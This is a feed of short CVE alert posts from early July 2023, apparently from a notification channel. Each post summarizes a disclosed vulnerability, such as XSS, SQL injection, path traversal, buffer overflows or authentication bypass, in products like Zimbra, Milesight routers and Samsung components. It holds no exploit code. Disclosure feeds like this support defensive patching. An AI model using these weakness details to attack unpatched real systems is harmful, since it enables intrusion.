| 2023-07-06 21:58:29 |
🚨 CVE-2023-2700A vulnerability was found in libvirt. This security flaw ouccers due to repeatedly querying an SR-IOV PCI device's capabilities that exposes a memory leak caused by a failure to free the virPCIVirtualFunction array within the parent struct's g_autoptr cleanup.🎖@cveNotify |
|
| 2023-07-06 21:58:25 |
🚨 CVE-2022-3515A vulnerability was found in the Libksba library due to an integer overflow within the CRL parser. The vulnerability can be exploited remotely for code execution on the target system by passing specially crafted data to the application, for example, a malicious S/MIME attachment.🎖@cveNotify |
|
| 2023-07-06 21:58:24 |
🚨 CVE-2023-34599Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code.🎖@cveNotify |
|
| 2023-07-06 21:58:23 |
🚨 CVE-2023-35169PHP-IMAP is a wrapper for common IMAP communication without the need to have the php-imap module installed / enabled. Prior to version 5.3.0, an unsanitized attachment filename allows any unauthenticated user to leverage a directory traversal vulnerability, which results in a remote code execution vulnerability. Every application that stores attachments with `Attachment::save()` without providing a `$filename` or passing unsanitized user input is affected by this attack.An attacker can send an email with a malicious attachment to the inbox, which gets crawled with `webklex/php-imap` or `webklex/laravel-imap`. Prerequisite for the vulnerability is that the script stores the attachments without providing a `$filename`, or providing an unsanitized `$filename`, in `src/Attachment::save(string $path, string $filename = null)`. In this case, where no `$filename` gets passed into the `Attachment::save()` method, the package would use a series of unsanitized and insecure input values from the mail as fallback. Even if a developer passes a `$filename` into the `Attachment::save()` method, e.g. by passing the name or filename of the mail attachment itself (from email headers), the input values never get sanitized by the package. There is also no restriction about the file extension (e.g. ".php") or the contents of a file. This allows an attacker to upload malicious code of any type and content at any location where the underlying user has write permissions. The attacker can also overwrite existing files and inject malicious code into files that, e.g. get executed by the system via cron or requests.Version 5.3.0 contains a patch for this issue.🎖@cveNotify |
|
| 2023-07-06 21:58:19 |
🚨 CVE-2023-1150Uncontrolled resource consumption in Series WAGO 750-3x/-8x products may allow an unauthenticated remote attacker to DoS the MODBUS server with specially crafted packets.🎖@cveNotify |
|
| 2023-07-06 21:58:18 |
🚨 CVE-2023-3249The Web3 – Crypto wallet Login & NFT token gating plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.6.0. This is due to incorrect authentication checking in the 'hidden_form_data' function. This makes it possible for authenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.🎖@cveNotify |
|
| 2023-07-06 21:58:17 |
🚨 CVE-2023-37299Joplin before 2.11.5 allows XSS via an AREA element of an image map.🎖@cveNotify |
|
| 2023-07-06 18:58:32 |
🚨 CVE-2023-29381An issue in Zimbra Collaboration (ZCS) v.8.8.15 and v.9.0 allows a remote attacker to escalate privileges and obtain sensitive information via the password and 2FA parameters.🎖@cveNotify |
|
| 2023-07-06 18:58:31 |
🚨 CVE-2023-29382An issue in Zimbra Collaboration ZCS v.8.8.15 and v.9.0 allows an attacker to execute arbitrary code via the sfdc_preauth.jsp component.🎖@cveNotify |
|
| 2023-07-06 18:58:30 |
🚨 CVE-2023-30320Cross Site Scripting (XSS) vulnerability in textMessage field in /src/chatbotapp/chatWindow.java in wliang6 ChatEngine commit fded8e710ad59f816867ad47d7fc4862f6502f3e, allows attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-07-06 18:58:26 |
🚨 CVE-2023-34192Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.🎖@cveNotify |
|
| 2023-07-06 18:58:25 |
🚨 CVE-2023-1602The Short URL plugin for WordPress is vulnerable to stored Cross-Site Scripting via the 'comment' parameter due to insufficient input sanitization and output escaping in versions up to, and including, 1.6.4. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-07-06 18:58:24 |
🚨 CVE-2023-33566An unauthorized node injection vulnerability has been identified in ROS2 Foxy Fitzroy versions where ROS_VERSION is 2 and ROS_PYTHON_VERSION is 3. This vulnerability could allow a malicious user to inject malicious ROS2 nodes into the system remotely. Once injected, these nodes could disrupt the normal operations of the system or cause other potentially harmful behavior.🎖@cveNotify |
|
| 2023-07-06 18:58:23 |
🚨 CVE-2023-34843Traggo Server 0.3.0 is vulnerable to directory traversal via a crafted GET request.🎖@cveNotify |
|
| 2023-07-06 18:58:19 |
🚨 CVE-2023-24520Two OS command injection vulnerability exist in the vtysh_ubus toolsh_excute.constprop.1 functionality of Milesight UR32L v32.3.0.5. A specially-crafted network request can lead to command execution. An attacker can send a network request to trigger these vulnerabilities.This command injection is in the trace tool utility.🎖@cveNotify |
|
| 2023-07-06 18:58:18 |
🚨 CVE-2023-25088Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the firewall_handler_set function with the index and description variables.🎖@cveNotify |
|
| 2023-07-06 18:58:17 |
🚨 CVE-2023-25095Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_qos function with the rule_name variable with two possible format strings that represent negated commands.🎖@cveNotify |
|
| 2023-07-06 18:58:13 |
🚨 CVE-2023-25115Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_openvpn_client function with the remote_ip and the port variables.🎖@cveNotify |
|
| 2023-07-06 18:58:12 |
🚨 CVE-2023-25121Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_ike_profile function with the secrets_local variable.🎖@cveNotify |
|
| 2023-07-06 18:58:11 |
🚨 CVE-2023-25582Two OS command injection vulnerabilities exist in the zebra vlan_name functionality of Milesight UR32L v32.3.0.5. A specially crafted network request can lead to command execution. An attacker can send a network request to trigger these vulnerabilities.This command injection is in the code branch that manages an already existing vlan configuration.🎖@cveNotify |
|
| 2023-07-06 16:58:31 |
🚨 CVE-2023-34647PHPgurukl Hostel Management System v.1.0 is vulnerable to Cross Site Scripting (XSS).🎖@cveNotify |
|
| 2023-07-06 16:58:27 |
🚨 CVE-2023-34652PHPgurukl Hostel Management System v.1.0 is vulnerable to Cross Site Scripting (XSS) via Add New Course.🎖@cveNotify |
|
| 2023-07-06 16:58:26 |
🚨 CVE-2023-33661Multiple cross-site scripting (XSS) vulnerabilities were discovered in Church CRM v4.5.3 in GroupReports.php via GroupRole, ReportModel, and OnlyCart parameters.🎖@cveNotify |
|
| 2023-07-06 16:58:25 |
🚨 CVE-2023-34738Chemex through 3.7.1 is vulnerable to arbitrary file upload.🎖@cveNotify |
|
| 2023-07-06 16:58:21 |
🚨 CVE-2023-22319A sql injection vulnerability exists in the requestHandlers.js LoginAuth functionality of Milesight VPN v2.0.2. A specially-crafted network request can lead to authentication bypass. An attacker can send a malicious packet to trigger this vulnerability.🎖@cveNotify |
|
| 2023-07-06 16:58:20 |
🚨 CVE-2023-23547A directory traversal vulnerability exists in the luci2-io file-export mib functionality of Milesight UR32L v32.3.0.5. A specially crafted network request can lead to arbitrary file read. An attacker can send a network request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-07-06 16:58:19 |
🚨 CVE-2023-24019A stack-based buffer overflow vulnerability exists in the urvpn_client http_connection_readcb functionality of Milesight UR32L v32.3.0.5. A specially crafted network packet can lead to a buffer overflow. An attacker can send a malicious packet to trigger this vulnerability.🎖@cveNotify |
|
| 2023-07-06 16:58:16 |
🚨 CVE-2023-24520Two OS command injection vulnerability exist in the vtysh_ubus toolsh_excute.constprop.1 functionality of Milesight UR32L v32.3.0.5. A specially-crafted network request can lead to command execution. An attacker can send a network request to trigger these vulnerabilities.This command injection is in the trace tool utility.🎖@cveNotify |
|
| 2023-07-06 16:58:15 |
🚨 CVE-2023-25088Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the firewall_handler_set function with the index and description variables.🎖@cveNotify |
|
| 2023-07-06 16:58:14 |
🚨 CVE-2023-25098Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_qos function with the source variable.🎖@cveNotify |
|
| 2023-07-06 14:58:46 |
🚨 CVE-2023-3405Unchecked parameter value in M-Files Server in versions before 23.6.12695.3 (excluding 23.2 SR2 and newer) allows anonymous user to cause denial of service🎖@cveNotify |
|
| 2023-07-06 14:58:44 |
🚨 CVE-2023-1118A flaw use after free in the Linux kernel integrated infrared receiver/transceiver driver was found in the way user detaching rc device. A local user could use this flaw to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-07-06 14:58:42 |
🚨 CVE-2022-41968Nextcloud Server is an open source personal cloud server. Prior to versions 23.0.10 and 24.0.5, calendar name lengths are not validated before writing to a database. As a result, an attacker can send unnecessary amounts of data against the database. Version 23.0.10 and 24.0.5 contain patches for the issue. No known workarounds are available.🎖@cveNotify |
|
| 2023-07-06 14:58:41 |
🚨 CVE-2022-24713regex is an implementation of regular expressions for the Rust language. The regex crate features built-in mitigations to prevent denial of service attacks caused by untrusted regexes, or untrusted input matched by trusted regexes. Those (tunable) mitigations already provide sane defaults to prevent attacks. This guarantee is documented and it's considered part of the crate's API. Unfortunately a bug was discovered in the mitigations designed to prevent untrusted regexes to take an arbitrary amount of time during parsing, and it's possible to craft regexes that bypass such mitigations. This makes it possible to perform denial of service attacks by sending specially crafted regexes to services accepting user-controlled, untrusted regexes. All versions of the regex crate before or equal to 1.5.4 are affected by this issue. The fix is include starting from regex 1.5.5. All users accepting user-controlled regexes are recommended to upgrade immediately to the latest version of the regex crate. Unfortunately there is no fixed set of problematic regexes, as there are practically infinite regexes that could be crafted to exploit this vulnerability. Because of this, it us not recommend to deny known problematic regexes.🎖@cveNotify |
|
| 2023-07-06 14:58:39 |
🚨 CVE-2022-41954MPXJ is an open source library to read and write project plans from a variety of file formats and databases. On Unix-like operating systems (not Windows or macos), MPXJ's use of `File.createTempFile(..)` results in temporary files being created with the permissions `-rw-r--r--`. This means that any other user on the system can read the contents of this file. When MPXJ is reading a schedule file which requires the creation of a temporary file or directory, a knowledgeable local user could locate these transient files while they are in use and would then be able to read the schedule being processed by MPXJ. The problem has been patched, MPXJ version 10.14.1 and later includes the necessary changes. Users unable to upgrade may set `java.io.tmpdir` to a directory to which only the user running the application has access will prevent other users from accessing these temporary files.🎖@cveNotify |
|
| 2023-07-06 14:58:37 |
🚨 CVE-2023-34395Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Apache Software Foundation Apache Airflow ODBC Provider.In OdbcHook, A privilege escalation vulnerability exists in a system due to controllable ODBC driver parameters that allow the loading of arbitrary dynamic-link libraries, resulting in command execution.Starting version 4.0.0 driver can be set only from the hook constructor.This issue affects Apache Airflow ODBC Provider: before 4.0.0.🎖@cveNotify |
|
| 2023-07-06 14:58:36 |
🚨 CVE-2022-41944Discourse is an open-source discussion platform. In stable versions prior to 2.8.12 and beta or tests-passed versions prior to 2.9.0.beta.13, under certain conditions, a user can see notifications for topics they no longer have access to. If there is sensitive information in the topic title, it will therefore have been exposed. This issue is patched in stable version 2.8.12, beta version 2.9.0.beta13, and tests-passed version 2.9.0.beta13. There are no workarounds available.🎖@cveNotify |
|
| 2023-07-06 14:58:35 |
🚨 CVE-2022-41935XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users without the right to view documents can deduce their existence by repeated Livetable queries. The issue has been patched in XWiki 14.6RC1, 13.10.8, and 14.4.3, the response is not properly cleaned up of obfuscated entries. As a workaround, The patch for the document `XWiki.LiveTableResultsMacros` can be manually applied or a XAR archive of a patched version can be imported, on versions 12.10.11, 13.9-rc-1, and 13.4.4. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-07-06 14:58:33 |
🚨 CVE-2022-41952Synapse before 1.52.0 with URL preview functionality enabled will attempt to generate URL previews for media stream URLs without properly limiting connection time. Connections will only be terminated after `max_spider_size` (default: 10M) bytes have been downloaded, which can in some cases lead to long-lived connections towards the streaming media server (for instance, Icecast). This can cause excessive traffic and connections toward such servers if their stream URL is, for example, posted to a large room with many Synapse instances with URL preview enabled. Version 1.52.0 implements a timeout mechanism which will terminate URL preview connections after 30 seconds. Since generating URL previews for media streams is not supported and always fails, 1.53.0 additionally implements an allow list for content types for which Synapse will even attempt to generate a URL preview. Upgrade to 1.53.0 to fully resolve the issue. As a workaround, turn off URL preview functionality by setting `url_preview_enabled: false` in the Synapse configuration file.🎖@cveNotify |
|
| 2023-07-06 14:58:31 |
🚨 CVE-2022-24906Nextcloud Deck is a Kanban-style project & personal management tool for Nextcloud, similar to Trello. The full path of the application is exposed to unauthorized users. It is recommended that the Nextcloud Deck app is upgraded to 1.2.11, 1.4.6, or 1.5.4. There is no workaround available.🎖@cveNotify |
|
| 2023-07-06 14:58:30 |
🚨 CVE-2022-24897APIs to evaluate content with Velocity is a package for APIs to evaluate content with Velocity. Starting with version 2.3 and prior to 12.6.7, 12.10.3, and 13.0, the velocity scripts are not properly sandboxed against using the Java File API to perform read or write operations on the filesystem. Writing an attacking script in Velocity requires the Script rights in XWiki so not all users can use it, and it also requires finding an XWiki API which returns a File. The problem has been patched in versions 12.6.7, 12.10.3, and 13.0. There is no easy workaround for fixing this vulnerability other than upgrading and being careful when giving Script rights.🎖@cveNotify |
|
| 2023-07-06 14:58:29 |
🚨 CVE-2022-24888Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform. Prior to versions 20.0.14.4, 21.0.8, 22.2.4, and 23.0.1, it is possible to create files and folders that have leading and trailing \n, \r, \t, and \v characters. The server rejects files and folders that have these characters in the middle of their names, so this might be an opportunity for injection. This issue is fixed in versions 20.0.14.4, 21.0.8, 22.2.4, and 23.0.1. There are currently no known workarounds.🎖@cveNotify |
|
| 2023-07-06 14:58:28 |
🚨 CVE-2021-46894Use After Free (UAF) vulnerability in the uinput module.Successful exploitation of this vulnerability may lead to kernel privilege escalation.🎖@cveNotify |
|
| 2023-07-06 14:58:27 |
🚨 CVE-2021-46892Encryption bypass vulnerability in Maintenance mode. Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-07-06 14:58:23 |
🚨 CVE-2022-48507Vulnerability of identity verification being bypassed in the storage module. Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-07-06 14:58:22 |
🚨 CVE-2022-48507Vulnerability of identity verification being bypassed in the storage module. Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-07-06 14:58:21 |
🚨 CVE-2022-48508 Inappropriate authorization vulnerability in the system apps. Successful exploitation of this vulnerability may affect service integrity.🎖@cveNotify |
|
| 2023-07-06 14:58:20 |
🚨 CVE-2022-48508 Inappropriate authorization vulnerability in the system apps. Successful exploitation of this vulnerability may affect service integrity.🎖@cveNotify |
|
| 2023-07-06 14:58:19 |
🚨 CVE-2022-48510Input verification vulnerability in the AMS module. Successful exploitation of this vulnerability will cause unauthorized operations.🎖@cveNotify |
|
| 2023-07-06 12:58:35 |
🚨 CVE-2023-30648Stack out-of-bounds write vulnerability in IpcRxImeiUpdateImeiNoti of RILD priro to SMR Jul-2023 Release 1 cause a denial of service on the system.🎖@cveNotify |
|
| 2023-07-06 12:58:34 |
🚨 CVE-2023-30649Heap out of bound write vulnerability in RmtUimNeedApdu of RILD prior to SMR Jul-2023 Release 1 allows attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-07-06 12:58:33 |
🚨 CVE-2023-30653Out of bounds read and write in enableTspDevice of sysinput HAL service prior to SMR Jul-2023 Release 1 allows local attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-07-06 12:58:32 |
🚨 CVE-2023-30655Improper input validation vulnerability in SCEPProfile prior to SMR Jul-2023 Release 1 allows local attackers to launch privileged activities.🎖@cveNotify |
|
| 2023-07-06 12:58:31 |
🚨 CVE-2023-30658Improper input validation vulnerability in DataProfile prior to SMR Jul-2023 Release 1 allows local attackers to launch privileged activities.🎖@cveNotify |
|
| 2023-07-06 12:58:30 |
🚨 CVE-2023-30660Exposure of Sensitive Information vulnerability in getDefaultChipId in UwbAospAdapterService prior to SMR Jul-2023 Release 1 allows local attackers to access the UWB chipset Identifier.🎖@cveNotify |
|
| 2023-07-06 12:58:29 |
🚨 CVE-2023-30663Improper input validation vulnerability in OemPersonalizationSetLock in libsec-ril prior to SMR Jul-2023 Release 1 allows local attackers to cause an Out-Of-Bounds write.🎖@cveNotify |
|
| 2023-07-06 12:58:28 |
🚨 CVE-2023-30665Improper input validation vulnerability in OnOemServiceMode in libsec-ril prior to SMR Jul-2023 Release 1 allows local attackers to cause an Out-Of-Bounds read.🎖@cveNotify |
|
| 2023-07-06 12:58:27 |
🚨 CVE-2023-30667Improper access control in Audio system service prior to SMR Jul-2023 Release 1 allows attacker to send broadcast with system privilege.🎖@cveNotify |
|
| 2023-07-06 12:58:26 |
🚨 CVE-2023-30670Out-of-bounds Write in BuildIpcFactoryDeviceTestEvent of libsec-ril prior to SMR Jul-2023 Release 1 allows local attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-07-06 12:58:22 |
🚨 CVE-2023-30672Improper privilege management vulnerability in Samsung Smart Switch for Windows Installer prior to version 4.3.23043_3 allows attackers to cause permanent DoS via directory junction.🎖@cveNotify |
|
| 2023-07-06 12:58:21 |
🚨 CVE-2023-30674Improper configuration in Samsung Internet prior to version 21.0.0.41 allows attacker to bypass SameSite Cookie.🎖@cveNotify |
|
| 2023-07-06 12:58:20 |
🚨 CVE-2023-30676Improper access control vulnerability in Samsung Pass prior to version 4.2.03.1 allows physical attackers to access data of Samsung Pass.🎖@cveNotify |
|
| 2023-07-06 12:58:19 |
🚨 CVE-2023-30677Improper access control vulnerability in Samsung Pass prior to version 4.2.03.1 allows physical attackers to access data of Samsung Pass on a certain state of an unlocked device.🎖@cveNotify |
|
| 2023-07-06 12:58:18 |
🚨 CVE-2023-30678Potential zip path traversal vulnerability in Calendar application prior to version 12.4.07.15 in Android 13 allows attackers to write arbitrary file.🎖@cveNotify |
|
| 2023-07-06 12:58:17 |
🚨 CVE-2022-46080Nexxt Nebula 1200-AC 15.03.06.60 allows authentication bypass and command execution by using the HTTPD service to enable TELNET.🎖@cveNotify |
|
| 2023-07-06 12:58:16 |
🚨 CVE-2023-24256An issue in the com.nextev.datastatistic component of NIO EC6 Aspen before v3.3.0 allows attackers to escalate privileges via path traversal.🎖@cveNotify |
|
| 2023-07-06 12:58:14 |
🚨 CVE-2023-30640Improper access control vulnerability in PersonaManagerService prior to SMR Jul-2023 Release 1 allows local attackers to change confiugration.🎖@cveNotify |
|
| 2023-07-06 12:58:13 |
🚨 CVE-2023-30642Improper privilege management vulnerability in Galaxy Themes Service prior to SMR Jul-2023 Release 1 allows local attackers to call privilege function.🎖@cveNotify |
|
| 2023-07-06 12:58:12 |
🚨 CVE-2023-30641Improper access control vulnerability in Settings prior to SMR Jul-2023 Release 1 allows physical attacker to use restricted user profile to access device owner's google account data.🎖@cveNotify |
|
| 2023-07-06 11:58:34 |
🚨 CVE-2023-3128Grafana is validating Azure AD accounts based on the email claim. On Azure AD, the profile email field is not unique and can be easily modified. This leads to account takeover and authentication bypass when Azure AD OAuth is configured with a multi-tenant app. 🎖@cveNotify |
|
| 2023-07-06 11:58:33 |
🚨 CVE-2023-2533A Cross-Site Request Forgery (CSRF) vulnerability has been identified inPaperCut NG/MF, which, under specific conditions, could potentially enablean attacker to alter security settings or execute arbitrary code. This couldbe exploited if the target is an admin with a current login session. Exploitingthis would typically involve the possibility of deceiving an admin into clickinga specially crafted malicious link, potentially leading to unauthorized changes.🎖@cveNotify |
|
| 2023-07-06 11:58:32 |
🚨 CVE-2023-26137All versions of the package drogonframework/drogon are vulnerable to HTTP Response Splitting when untrusted user input is used to build header values in the addHeader and addCookie functions. An attacker can add the \r\n (carriage return line feeds) characters to end the HTTP response headers and inject malicious content.🎖@cveNotify |
|
| 2023-07-06 11:58:31 |
🚨 CVE-2023-26138All versions of the package drogonframework/drogon are vulnerable to CRLF Injection when untrusted user input is used to set request headers in the addHeader function. An attacker can add the \r\n (carriage return line feeds) characters and inject additional headers in the request sent.🎖@cveNotify |
|
| 2023-07-06 05:58:54 |
🚨 CVE-2023-30651Out of bounds read and write in callgetTspsysfs of sysinput HAL service prior to SMR Jul-2023 Release 1 allows local attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-07-06 05:58:53 |
🚨 CVE-2023-30646Heap out of bound write vulnerability in BroadcastSmsConfig of RILD prior to SMR Jul-2023 Release 1 allows attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-07-06 05:58:52 |
🚨 CVE-2023-30649Heap out of bound write vulnerability in RmtUimNeedApdu of RILD prior to SMR Jul-2023 Release 1 allows attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-07-06 05:58:48 |
🚨 CVE-2023-30655Improper input validation vulnerability in SCEPProfile prior to SMR Jul-2023 Release 1 allows local attackers to launch privileged activities.🎖@cveNotify |
|
| 2023-07-06 05:58:47 |
🚨 CVE-2023-30660Exposure of Sensitive Information vulnerability in getDefaultChipId in UwbAospAdapterService prior to SMR Jul-2023 Release 1 allows local attackers to access the UWB chipset Identifier.🎖@cveNotify |
|
| 2023-07-06 05:58:46 |
🚨 CVE-2023-30663Improper input validation vulnerability in OemPersonalizationSetLock in libsec-ril prior to SMR Jul-2023 Release 1 allows local attackers to cause an Out-Of-Bounds write.🎖@cveNotify |
|
| 2023-07-06 05:58:42 |
🚨 CVE-2023-30667Improper access control in Audio system service prior to SMR Jul-2023 Release 1 allows attacker to send broadcast with system privilege.🎖@cveNotify |
|
| 2023-07-06 05:58:41 |
🚨 CVE-2023-30672Improper privilege management vulnerability in Samsung Smart Switch for Windows Installer prior to version 4.3.23043_3 allows attackers to cause permanent DoS via directory junction.🎖@cveNotify |
|
| 2023-07-06 05:58:40 |
🚨 CVE-2023-30674Improper configuration in Samsung Internet prior to version 21.0.0.41 allows attacker to bypass SameSite Cookie.🎖@cveNotify |
|
| 2023-07-06 05:58:37 |
🚨 CVE-2023-30676Improper access control vulnerability in Samsung Pass prior to version 4.2.03.1 allows physical attackers to access data of Samsung Pass.🎖@cveNotify |
|
| 2023-07-06 05:58:36 |
🚨 CVE-2023-30678Potential zip path traversal vulnerability in Calendar application prior to version 12.4.07.15 in Android 13 allows attackers to write arbitrary file.🎖@cveNotify |
|
| 2023-07-06 05:58:35 |
🚨 CVE-2023-30642Improper privilege management vulnerability in Galaxy Themes Service prior to SMR Jul-2023 Release 1 allows local attackers to call privilege function.🎖@cveNotify |
|
| 2023-07-06 01:58:19 |
🚨 CVE-2023-36813Kanboard is project management software that focuses on the Kanban methodology. In versions prior to 1.2.31authenticated user is able to perform a SQL Injection, leading to a privilege escalation or loss of confidentiality. It appears that in some insert and update operations, the code improperly uses the PicoDB library to update/insert new information. Version 1.2.31 contains a fix for this issue.🎖@cveNotify |
|
| 2023-07-06 01:58:15 |
🚨 CVE-2023-36809Kiwi TCMS, an open source test management system allows users to upload attachments to test plans, test cases, etc. Versions of Kiwi TCMS prior to 12.5 had introduced changes which were meant to serve all uploaded files as plain text in order to prevent browsers from executing potentially dangerous files when such files are accessed directly. The previous Nginx configuration was incorrect allowing certain browsers like Firefox to ignore the `Content-Type: text/plain` header on some occasions thus allowing potentially dangerous scripts to be executed. Additionally, file upload validators and parts of the HTML rendering code had been found to require additional sanitation and improvements. Version 12.5 fixes this vulnerability with updated Nginx content type configuration, improved file upload validation code to prevent more potentially dangerous uploads, and Sanitization of test plan names used in the `tree_view_html()` function.🎖@cveNotify |
|
| 2023-07-06 01:58:14 |
🚨 CVE-2023-36822Uptime Kuma, a self-hosted monitoring tool, has a path traversal vulnerability in versions prior to 1.22.1. Uptime Kuma allows authenticated users to install plugins from an official list of plugins. This feature is currently disabled in the web interface, but the corresponding API endpoints are still available after login. Before a plugin is downloaded, the plugin installation directory is checked for existence. If it exists, it's removed before the plugin installation. Because the plugin is not validated against the official list of plugins or sanitized, the check for existence and the removal of the plugin installation directory are prone to path traversal. This vulnerability allows an authenticated attacker to delete files from the server Uptime Kuma is running on. Depending on which files are deleted, Uptime Kuma or the whole system may become unavailable due to data loss.🎖@cveNotify |
|
| 2023-07-06 01:58:13 |
🚨 CVE-2023-36827Fides is an open-source privacy engineering platform for managing the fulfillment of data privacy requests in a runtime environment, and the enforcement of privacy regulations in code. A path traversal (directory traversal) vulnerability affects fides versions lower than version `2.15.1`, allowing remote attackers to access arbitrary files on the fides webserver container's filesystem. The vulnerability is patched in fides `2.15.1`.If the Fides webserver API is not directly accessible to attackers and is instead deployed behind a reverse proxy as recommended in Ethyca's security best practice documentation, and the reverse proxy is an AWS application load balancer, the vulnerability can't be exploited by these attackers. An AWS application load balancer will reject this attack with a 400 error. Additionally, any secrets supplied to the container using environment variables rather than a `fides.toml` configuration file are not affected by this vulnerability.🎖@cveNotify |
|
| 2023-07-06 01:58:12 |
🚨 CVE-2023-36828Statamic is a flat-first, Laravel and Git powered content management system. Prior to version 4.10.0, the SVG tag does not sanitize malicious SVG. Therefore, an attacker can exploit this vulnerability to perform cross-site scripting attacks using SVG, even when using the `sanitize` function. Version 4.10.0 contains a patch for this issue.🎖@cveNotify |
|
| 2023-07-05 22:58:13 |
🚨 CVE-2023-27199PAX Technology A930 PayDroid_7.1.1_Virgo_V04.5.02_20220722 allows attackers to compile a malicious shared library and use LD_PRELOAD to bypass authorization checks.🎖@cveNotify |
|
| 2023-07-05 22:58:12 |
🚨 CVE-2023-27198PAX A930 device with PayDroid_7.1.1_Virgo_V04.5.02_20220722 can allow the execution of arbitrary commands by using the exec service and including a specific word in the command to be executed. The attacker must have physical USB access to the device in order to exploit this vulnerability.🎖@cveNotify |
|
| 2023-07-05 20:58:33 |
🚨 CVE-2023-3332Improper Neutralization of Input During Web Page Generation vulnerability in NEC Corporation Aterm Aterm WG2600HP2, WG2600HP, WG2200HP, WG1800HP2, WG1800HP, WG1400HP, WG600HP, WG300HP, WF300HP, WR9500N, WR9300N, WR8750N, WR8700N, WR8600N, WR8370N, WR8175N and WR8170N all versions allows a attacker to execute an arbitrary script, after obtaining a high privilege exploiting CVE-2023-3330 and CVE-2023-3331 vulnerabilities.🎖@cveNotify |
|
| 2023-07-05 20:58:32 |
🚨 CVE-2023-3333Improper Neutralization of Special Elements used in an OS Command vulnerability in NEC Corporation Aterm WG2600HP2, WG2600HP, WG2200HP, WG1800HP2, WG1800HP, WG1400HP, WG600HP, WG300HP, WF300HP, WR9500N, WR9300N, WR8750N, WR8700N, WR8600N, WR8370N, WR8175N and WR8170N all versions allows a attacker to execute an arbitrary OS command with the root privilege, after obtaining a high privilege exploiting CVE-2023-3330 and CVE-2023-3331 vulnerabilities.🎖@cveNotify |
|
| 2023-07-05 20:58:31 |
🚨 CVE-2023-34337AMI SPx contains a vulnerability in the BMC where a user may cause an inadequate encryption strength by hash-based message authentication code (HMAC). A successful exploit of this vulnerability may lead to a loss of confidentiality, integrity, and availability. 🎖@cveNotify |
|
| 2023-07-05 20:58:30 |
🚨 CVE-2023-34338AMI SPx contains a vulnerability in the BMC where an Attacker may cause a use of hard-coded cryptographic key by a hard-coded certificate. A successful exploit of this vulnerability may lead to a loss of confidentiality, integrity, and availability. 🎖@cveNotify |
|
| 2023-07-05 20:58:26 |
🚨 CVE-2023-34471 AMI SPx contains a vulnerability in the BMC where a user may cause a missing cryptographic step by generating a hash-based message authentication code (HMAC). A successful exploit of this vulnerability may lead to the loss confidentiality, integrity, and authentication.🎖@cveNotify |
|
| 2023-07-05 20:58:25 |
🚨 CVE-2023-34473AMI SPx contains a vulnerability in the BMC where a valid user may cause a use of hard-coded credentials. A successful exploit of this vulnerability may lead to a loss of confidentiality, integrity, and availability. 🎖@cveNotify |
|
| 2023-07-05 20:58:24 |
🚨 CVE-2023-35001Linux Kernel nftables Out-Of-Bounds Read/Write Vulnerability; nft_byteorder poorly handled vm register contents when CAP_NET_ADMIN is in any user or network namespace🎖@cveNotify |
|
| 2023-07-05 20:58:23 |
🚨 CVE-2023-22834The Contour Service was not checking that users had permission to create an analysis for a given dataset. This could allow an attacker to clutter up Compass folders with extraneous analyses, that the attacker would otherwise not have permission to create.🎖@cveNotify |
|
| 2023-07-05 20:58:20 |
🚨 CVE-2023-31975yasm v1.3.0 was discovered to contain a memory leak via the function yasm_intnum_copy at /libyasm/intnum.c.🎖@cveNotify |
|
| 2023-07-05 20:58:19 |
🚨 CVE-2023-31973yasm v1.3.0 was discovered to contain a use after free via the function expand_mmac_params at /nasm/nasm-pp.c.🎖@cveNotify |
|
| 2023-07-05 20:58:18 |
🚨 CVE-2023-31974yasm v1.3.0 was discovered to contain a use after free via the function error at /nasm/nasm-pp.c.🎖@cveNotify |
|
| 2023-07-05 20:58:17 |
